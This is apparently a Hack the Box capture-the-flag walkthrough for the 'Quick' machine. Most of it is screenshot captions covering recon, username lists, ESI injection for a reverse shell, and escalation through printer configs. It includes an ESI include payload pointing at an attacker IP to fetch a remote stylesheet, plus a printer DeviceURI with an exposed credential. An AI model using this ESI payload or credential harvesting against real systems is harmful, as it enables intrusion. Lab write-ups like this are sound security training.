Hack the Box: Quick

Quick

User

Recon

Nmap TCP scan shows only one attack surface: webserver on an unusual port- 9001:

nmap scan
Main page
Client list
Login page
We are migrating our portal with latest 
UDP scan, port 443
HTTP/3 connection
Quick portal landing page
About us page
Docs page
Default password
jane
jdoe
mike
mross
john
tim
roy
james
elisa
admin
root
QConsulting.htb
QConsulting.co.uk
QConsulting.uk
QConsulting.com
Darkwing.htb
DarkwingSolutions.htb
Darkwing.com
DarkwingSolutions.com
Darkwing.us
DarkwingSolutions.us
Wink.uk
Wink.co.uk
Wink.com
LazyCoop.com
LazyCoop.cn
ScoobyDoo.it
ScoobyDoo.com
PenguinCrop.fr
PenguinCrop.com
quick.htb
Wfuzz result

Foothold

After logging in I’m greeted with a simple ticketing system:

Quick ticketing system
Request to create ticket
XSS
<esi:include%20src%3d"http://10.10.14.18/"%20stylesheet%3d"http://10.10.14.18/esi.xsl"></esi:include>
Request for tellico
Download attempt
Stager executed
Staging log
Reverese shell
Reverse shell

Privlege escalation

Lateral movement

The sites-available config of apache suggests that under virtual domain printerv2.quick.htb there’s another host running on port 9001 with srvadm privleges:

sites-available
Password check
Preparing the hash
Swapping the password to the webapplication
job.php
hunter.sh
Adding printer
Creating printer
Add a job
Hunter.sh
SSH login as srvadm

Root access

The srvadm’s home directory contains an interesting printers.conf file. The DeviceURI parameter of a second printer seems to contain some credentials:

$ cat ~/.cache/conf.d/printers.conf
--snip--
<Printer OLD_Aviatar>
PrinterId 2
--snip--
DeviceURI https://srvadm%40quick.htb:%26ftQ4K3SGde8%3F@printerv3.quick.htb/printer
Root access

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store